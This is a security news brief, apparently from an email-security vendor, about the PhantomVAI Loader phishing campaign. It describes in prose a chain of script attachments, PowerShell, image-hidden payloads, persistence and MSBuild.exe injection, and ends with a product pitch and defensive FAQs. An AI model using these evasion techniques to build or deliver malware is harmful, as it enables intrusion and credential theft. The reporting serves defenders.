PhantomVAI Loader expands globally, delivering malware to multiple sectors

A new global phishing campaign is using advanced evasion techniques to spread infostealers and remote access trojans across industries worldwide.

What happened

According to Cyber Press, cybersecurity researchers uncovered a widespread phishing operation deploying a sophisticated multi-stage malware loader dubbed PhantomVAI Loader. The campaign has targeted organizations in manufacturing, education, healthcare, government, and utilities sectors.

The attack begins with phishing emails posing as invoices or payment notifications containing malicious JavaScript or VBS attachments. These execute encoded PowerShell scripts that download disguised image files, hiding the loader’s payload using steganography.

Going deeper

PhantomVAI Loader’s payload is concealed in Base64-encoded data embedded within image files, identified by tags such as <<sudo_png>> and <<sudo_odt>>. Written in C#, the loader checks whether it’s running in a virtual machine, establishes persistence, and retrieves its final malware payload from attacker-controlled command-and-control (C2) servers.

The loader uses multiple persistence mechanisms, including scheduled PowerShell tasks, Windows registry Run keys, and WScript executions, to survive reboots. Once active, it injects malicious code into legitimate Windows processes, such as MSBuild.exe, to evade antivirus and endpoint detection tools.

PhantomVAI has been observed delivering a range of malware, including Katz Stealer, AsyncRAT, XWorm, FormBook, and DCRat. These tools can capture credentials, exfiltrate sensitive data, and provide remote system control to attackers.

The big picture

The PhantomVAI campaign shows how phishing has become a launchpad for advanced, multi-stage malware delivery. Attackers are hiding payloads inside image files, using legitimate Windows processes to stay invisible, and spreading across industries that rely heavily on email for operations. With malware-as-a-service kits like this now available to anyone, sophisticated attacks no longer require sophisticated hackers.

Paubox recommends Inbound Email Security as a defense against these kinds of email-borne threats. Its generative AI studies message tone, structure, and sender behavior to detect patterns that don’t match normal communication. That approach helps organizations block malicious emails carrying hidden loaders like PhantomVAI before they ever reach employees’ inboxes.

FAQs

What makes PhantomVAI Loader different from traditional malware loaders?

Unlike conventional loaders, PhantomVAI uses steganography to hide its payload inside image files, making detection through standard antivirus scanning much harder.

How does the use of MSBuild.exe help attackers evade detection?

MSBuild.exe is a legitimate Microsoft process used for software builds. By injecting code into it, attackers disguise malicious activity as normal system operations, bypassing many security tools.

Why are Malware-as-a-Service (MaaS) kits like Katz Stealer significant?

MaaS kits allow cybercriminals with limited technical skills to deploy sophisticated attacks by purchasing ready-made malware packages on underground markets.

How can organizations detect or block PhantomVAI-related activity?

Organizations should monitor PowerShell and MSBuild activity logs, enforce strict email filtering, and block known C2 domains associated with PhantomVAI campaigns.

What does the CIS region targeting exclusion suggest about the threat actor?

The malware’s decision to halt execution on systems using CIS country languages indicates the author may be located in or affiliated with that region, a common tactic to avoid local law enforcement scrutiny.